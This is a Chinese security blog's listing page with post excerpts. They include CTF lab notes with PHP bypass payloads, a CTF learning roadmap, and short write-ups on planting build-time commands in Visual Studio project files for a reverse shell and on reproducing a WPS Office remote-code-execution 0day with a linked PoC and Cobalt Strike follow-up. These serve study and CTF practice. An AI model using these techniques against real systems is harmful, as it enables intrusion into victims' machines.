[靶场笔记]第八章

tab绕过 非常少见的一种绕过形式,看标题就知道怎么操作了吧,想必就不用多介绍了 变量覆盖 先来看看下面这题 include('flag.php');error_reporting(0);$error='你还想要flag嘛?';$suces='既然你想要那给你吧!';foreach($_GET as $key => $value){ if($key==='error'){ die("what are you doing?!"); } $$key=$$value;}foreach($_POST as $key => $value){ if($value==='flag'){ die("what are you doing?!"); } $$key=$$value;}if(!($_POST['flag']==$flag)){ die($error);}echo "your are good".$flag."\n";die($suces); 想拿到flag的方法无非就是利用die($error)和die($suces)这两个函数 先上分别利用到这两个函数的payload 方法一: POST:error=a GET:a=flag 方法二 GET:a=flag&flag= 方法一利用的是一次POST判断和一次GET判断,达到第三变量a传值的目的 而方法二则是利用两次GET传值进行变量覆盖,并且绕过了下面的if(!($_POST['flag']==$flag)) md5无法解析数组 RT,返回值均为null parse_str() 把查询字符串解析到变量中。使用参考如下 传值的艺术 发现了一个十分微妙的地方,先来看看题目 <?php highlight_file(__FILE__); error_reporting(0); include("flag.php"); ​ if(isset($_POST['v1'])){ $v1 = $_POST['v1']; $v3 = $_GET['v3']; parse_str($v1,$v2); if($v2['flag']==md5($v3)){ echo $flag; } ​ } ?> 这里有两种方法可以拿到flag,第一种是通过md5匹配,另一种是通过md5处理数组返回均为null这个特点,结合弱比较来进行 但当我在传值的时候发现了一个有趣的现象,直接看下面这些结果你就能看出端倪 #有flag v1=flag=0cc175b9c0f1b6a831c399e269772661 v3=a #无flag v1="flag=0cc175b9c0f1b6a831c399e269772661" v3=a #有flag v1="flag=0" v3[]=1 #无flag v1=flag=0 v3[]=1 根据后两条有无flag的结果,结合弱比较表可以推断,有加双引号的一组将flag值赋值为了数字型的0,而每加的赋值为了字符型的0 ...

August 28, 2023 · 1 min · Red

XUJC CTFer的专属学习路线

**⚠︎温馨提示:**本学习路线适合TKK网安宝宝体质,全程可0基础观看。也欢迎想更加了解网络安全竞赛的你们踊跃举手发问🙋,我在评论区等你们😊。 哈喽,相信在看这篇学习路线的你一定是对网络安全,或者说“黑客技术”有着的进一步学习的信心,想进一步了解关于网络安全竞赛的事宜 不论你之前对这方面的掌握有多少,是不是脚本小子,会不会编程语言,数学好不好,甚至有没有计算机基础,都不妨碍你在黑客的领域进一步探索与学习。 本篇学习路线分为两个部分,“简介“和”学习步骤”。如果你想了解特定领域的内容,可以点击目录辅助观看噢 CTF简介 什么是CTF? CTF(Capture The Flag,夺旗赛)CTF 的前身是传统黑客之间的网络技术比拼游戏,起源于 1996 年第四届 DEFCON(世界黑客大会),以代替之前黑客们通过互相发起真实攻击进行技术比拼的方式。 CTF是一种流行的信息安全竞赛形式,其英文名可直译为“夺得Flag”,也可意译为“夺旗赛”。其大致流程是,参赛团队之间通过进行攻防对抗、程序分析等形式,率先从主办方给出的比赛环境中得到一串具有一定格式的字符串或其他内容,并将其提交给主办方,从而夺得分数。为了方便称呼,我们把这样的内容称之为**“flag”**🚩。 flag所表示的为目标服务器上存储的一些敏感机密的信息, 这些信息正常情况下是不能对外暴露的。选手利用目标的一些漏洞,获取到flag,其表示的即为在真实的黑客攻击中窃取到的机密信息。 一般情况下flag拥有固定格式为flag{xxxxx},有些比赛会把flag关键词替换,例如我们XUJC Lab平台的flag为xujc{xxxxx},利用固定格式来反推flag也是一种常见的解题思路 👀正常情况下,一场比赛中每支队伍人数为3到5人不定,每个人负责不同方向的题目(详细请往下看)。由于团队成员有各自不同方向的题目分配,因此就不存在一些其他比赛常见的”一人不会,队友带飞“的雷人场面。 🧑‍💻对于一个专业的黑客来说,拥有CTF经验是必不可少的。参加各大CTF赛事能够让你更加灵活地适应各类实战环境。而CTF考验最多的则是对一些从未被发现过的漏洞的挖掘,是最真实的黑客攻击过程。 CTF比赛的内容是什么? 和ACM的单一算法题不同,传统CTF比赛中有分为多种不同方向的题目。一般有web,pwn,reverse,misc和crypto等方向,近些年来又加入了诸如osint,Android,blockchain,AI等新方向。下面就让我们一一介绍 🌏web Web类题目大部分情况下和网络相关技能有关。主要考察选手对于网络攻防的一些知识技巧。诸如SQL注入、信息伪造、远程恶意代码执行、漏洞挖掘等等常见网络攻击手段。一般情况下Web题目会给出一个能够访问的网址,然后要求对其进行攻击。部分题目会给出网站源代码供漏洞挖掘。 实战案例:网站入侵,内网渗透 建议:适合喜欢研究网络有关的成员学习,也适合当作CTF入门方向 🔧pwn pwn这个名字最早也是出于世界黑客大会,从黑客们以攻破设备或者系统后的”boom“发音而来。Pwn类题目重点考察选手对于设备和系统底层逻辑漏洞的挖掘和利用能力,其攻破手段也通常在堆栈溢出、格式化漏洞、UAF、Double Free等常见底层二进制漏洞上。选手需要根据题目中给出的二进制可执行文件进行逆向分析,找出其中的漏洞并进行利用,编写对应的漏洞攻击脚本(Exploit),进而对主办方给出的远程服务器进行攻击并获取flag 实战案例:iphone越狱,路由器固件破解,操作系统提权 建议:适合对计算机硬件、计算机底层逻辑感兴趣的成员学习,学习门槛较高,对计算机原理功底要求高。不适合作为入门方向学习 🧑‍🔧reverse 顾名思义,reverse的含义是”逆向“。这类题目考察选手对软件的逆向工程能力。题目会给出一个可执行文件。选手需要逆向给出的程序,分析其程序工作原理。最终根据程序行为等提示找到flag 实战案例:游戏破解,游戏外挂编写 建议:适合喜欢研究软件破解、外挂编写的成员学习,对程序执行逻辑的分析能力要求高。 🔑crypto crypto题目考察选手对密码学相关知识的了解程度,诸如RSA、AES、DES等都是密码学题目的常客。有些时候也会给出一个加密脚本和密文,根据加密流程逆推出明文。 实战案例:程序加密逆向 建议:适合喜欢数学、或数学成绩较好的成员学习。(鉴于难度奇高,不推荐学习) 🤹misc misc意为杂项,即不包含在以上分类的题目都会放到这个分类。题目会给出一个附件。选手下载该附件进行分析,最终得出flag。misc常见的题型有图片隐写、视频隐写、文档隐写、流量分析、协议分析、游戏、IoT相关等等。五花八门,种类繁多。 实战案例:信息隐藏 建议:适合喜欢研究使用各类工具软件(文本处理、图像处理、音频处理)的成员学习,适合作为入门方向学习。 🔎osint osint早期被归纳为misc。其实就是近年来在各大视频网站上火起来的“网络迷踪”,也叫情报分析。题目通过提供一张照片、一段话或是其他任意形式的线索,供选手寻找一些信息(例如某个建筑的名字、某个时间、甚至某个人的名字以及其他敏感信息),并作为flag提交 实战案例:参考柯南😂 建议:适合所有成员学习,可以配合misc作为入门方向,但不适合专攻 📱android android题考验选手对安卓系统的了解程度。通常以APK逆向,安卓系统“Root”等题目为主。 实战案例:安卓系统“Root”,安卓手机软件/游戏破解 建议:参考reverse的建议 🔗blockchain blockchain方向主要以区块链安全为主。题目有诸如虚拟货币钱包破解等。(该方向出现概率较小,因此可参照题目类型也较少。) 实战案例:比特币钱包盗用 建议:建议作为学习完上述某一方向后的拓展方向,不适合专攻 🤖AI 近年来大火的一个赛道,甚至有独立出CTF的AI安全比赛。出现在CTF中的题目将让选手自己制作AI模型,来检测出题者给出的病毒或恶意文件,利用AI分析出的数据拼凑出正确的flag 实战案例:垃圾邮件/短信检测,新型杀毒软件 建议:适合对机器学习感兴趣的成员学习 CTF比赛模式 说了这么多供你选择的方向,接下来就来看看各个方向要在不一样的比赛模式里要怎么大展身手吧🫵 😎值得一提的是,和大部分“闭卷式”的比赛不一样(例如ACM算法竞赛),为了模拟最真实的黑客入侵环境,不论是什么模式的CTF比赛,都是可以自由上网查阅资料的 Jeopardy-解题模式 (最经典🎻) 参赛队伍可以通过互联网或者现场网络线下参与,参数队伍通过与在线环境交互或文件离线分析,解决网络安全技术挑战获取相应分值,类似于 ACM 算法竞赛、信息学奥林匹克赛的根据总分和时间来进行排名。 这个解题模式一般会设置 一血(First Blood) 、 二血(Second Blood) 、 三血(Third Blood) ,也即最先完成的前三支队伍会获得额外分值,所以这不仅是对首先解出题目的队伍的分值鼓励,也是一种团队能力的间接体现。 ...

August 26, 2023 · 1 min · Red

[漏洞分享]Visual Studio恶意指令植入漏洞

漏洞成因 漏洞的形成主要是因为Visual Studio的项目文件(vcxproj)是基于XML格式的,XML文件本身并不包含可执行代码。然而,Visual Studio的XML解析器允许在项目文件中包含一些自定义的命令,这些命令可以在构建项目时被执行。 目前该漏洞影响至visual studio所有版本,微软官方还未做出回应 漏洞复现 假设这是一个你平时在用的一个项目文件 通过修改Visual Studio的项目文件(vcxproj)植入恶意命令(必须添加在该位置) 删除x64文件夹后,重新编译项目,就会发现弹出计算器,说明指令可被执行 漏洞利用 可以直接反弹shell,通过hoaxshell直接生成powershell命令,并植入到vcxproj文件中 当受害者编译后,就能获取到权限

August 11, 2023 · 1 min · Red

[靶场笔记]第七章

intval函数 用于获取变量的整数值(将其他进制转换成10进制输出) 数组绕过 来看看下面这段代码 include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } } 绕过方法很简单,把num变成数组就行,即num[]=1 +号利用 碰到一道比较巧妙的绕过题,先看代码 include("flag.php");highlight_file(__FILE__);if(isset($_GET['num'])){ $num = $_GET['num']; if($num==4476){ die("no no no!"); } if(preg_match("/[a-z]|\./i", $num)){ die("no no no!!"); } if(!strpos($num, "0")){ die("no no no!!!"); } if(intval($num,0)===4476){ echo $flag; }} 可以看到要想拿到flag,就得使用转换结果为4476的num值 但是显然8与16进制无法直接使用。怎么办呢?仔细观察if(!strpos($num, "0")),可以看这句用来阻止8进制使用的判断其实原理是判断第一位是不是0。怎么办呢?看到这里你应该也猜到了,利用+在url中代表空格的特点,最后的payload是num=+010574 ./绕过 同样也是一道很有意思的绕过题 if(isset($_GET['u'])){ if($_GET['u']=='flag.php'){ die("no no no"); }else{ highlight_file($_GET['u']); } } 虽然没法直接读取flag.php,但只要在前面加个./就能混淆视听 md5()函数空值 在题目中碰到md5函数第一反应不应该是去撞库(要是实在没办法也不是不行),而是想办法让其成为0或空值。来看看下面代码 if (isset($_POST['a']) and isset($_POST['b'])) { if ($_POST['a'] != $_POST['b']) if (md5($_POST['a']) === md5($_POST['b'])) echo $flag; } 当md5函数参数为数组的时候会发生错误,并返回NULL。可以利用这点进行构造payload a[]=1&b[]=2 ...

August 10, 2023 · 1 min · Red

[漏洞分享]WPS office 远程执行0day复现

废话不多说,直接上复现过程 先来看复现成功截图 这里需要注意wps版本,后面我会同代码和poc文档一起放上该版本下载链接 截至发文前虽然还没有公开poc,但从网上的一些复现结果中可以看出,都是将hosts记录添加为127.0.0.1,但为了更直观看到攻击机和受害者的网络拓补关系,这里我将恶意js代码放到了kali,将受害者的hosts记录添加为kali的ip,如上图所示 复现过程很简单,受害者在hosts文件中添加一条类似clientweb.docer.wps.cn.{xxxxx}wps.cn的记录后,在kali上存放恶意js代码的目录下用python启动一个简单的http服务,受害者打开攻击者准备好的恶意poc文档,就会使用wps内置的浏览器访问kali存放的恶意js代码页面,就能达到远程执行的目的(当时在群上说错了,是在受害者机器上添加hosts记录而不是攻击者) 为了拓展该漏洞的利用,可以使用cobalt strike生成对应shellcode,即可远程上线 文件下载链接:https://pan.baidu.com/s/1RziuqnlBrob7yjjLc0uXLg 提取码:reds

August 9, 2023 · 1 min · Red